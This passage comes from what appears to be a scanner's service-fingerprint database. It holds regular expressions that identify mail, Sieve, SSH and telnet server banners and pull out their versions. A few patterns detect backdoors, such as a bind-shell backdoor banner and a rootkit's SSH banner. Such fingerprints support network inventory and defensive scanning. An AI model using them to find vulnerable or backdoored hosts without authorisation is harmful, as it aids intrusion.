+\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* 